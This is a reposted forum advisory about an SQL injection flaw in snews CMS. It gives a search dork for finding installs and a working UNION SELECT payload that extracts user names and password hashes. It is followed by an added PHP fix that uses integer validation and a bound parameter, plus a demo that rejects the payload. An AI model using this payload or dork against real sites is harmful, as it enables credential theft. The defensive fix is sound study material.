China Network Penetration Testing Alliance

Title: CMS snews SQL Injection and Fix

Author: admin    Time: 2013-1-23 08:55
Title: CMS snews SQL Injection Vulnerability
Author: By onestree
Download: http://snewscms.com/
Tested on: ubuntu 12.10 / win 7
Keyword: inurl:"tanyakan pada rumput yang bergoyang"

*************************************************************

SQL poc:

http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]

Example:

http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*

Thanks:

  Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell

          indonesiancoder - moeslimh4x0r - go-coder

spesial my hunny :*
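
The title mentions a fix, but the post does not include one. As an added example (not part of the original post and not snews project code), one way to close this class of bug is to validate `id` as an integer and bind it as a query parameter. The `snews_news` table, its columns, the function names and the demo rows are assumptions made for illustration; only `snews_user` and the request string come from the post.

```php
<?php
// Added example: hypothetical handler for snews.php?act=shownews&id=...
// snews_news and its columns are assumed; snews_user is named in the post.

function parse_news_id($raw): ?int
{
    // Accept only a positive decimal integer. Comment markers, UNION
    // clauses, quotes and negative values all fail validation.
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

function show_news(PDO $db, $raw): ?array
{
    $id = parse_news_id($raw);
    if ($id === null) {
        return null; // caller should answer with 400 or 404
    }
    // Bound parameter: the value never becomes part of the SQL text.
    $stmt = $db->prepare('SELECT id, title, body FROM snews_news WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed demo data in an in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE snews_news (id INTEGER PRIMARY KEY, title TEXT, body TEXT)');
$db->exec('CREATE TABLE snews_user (id INTEGER PRIMARY KEY, user_name TEXT, user_pass TEXT)');
$db->exec("INSERT INTO snews_news VALUES (23, 'Hello', 'First post')");
$db->exec("INSERT INTO snews_user VALUES (1, 'admin', 'constructed-hash')");

// First input is a normal id; second is the request string from the post, URL-decoded.
$inputs = [
    '23',
    '-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6'
        . '/**/from/**/snews_user/**/where/**/id like 1/*',
];
foreach ($inputs as $raw) {
    $row = show_news($db, $raw);
    echo $row === null ? "rejected\n" : "news #{$row['id']}: {$row['title']}\n";
}
```

Either measure alone blocks the request shown in the post; using both means a later change that loosens validation still cannot alter the query structure.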




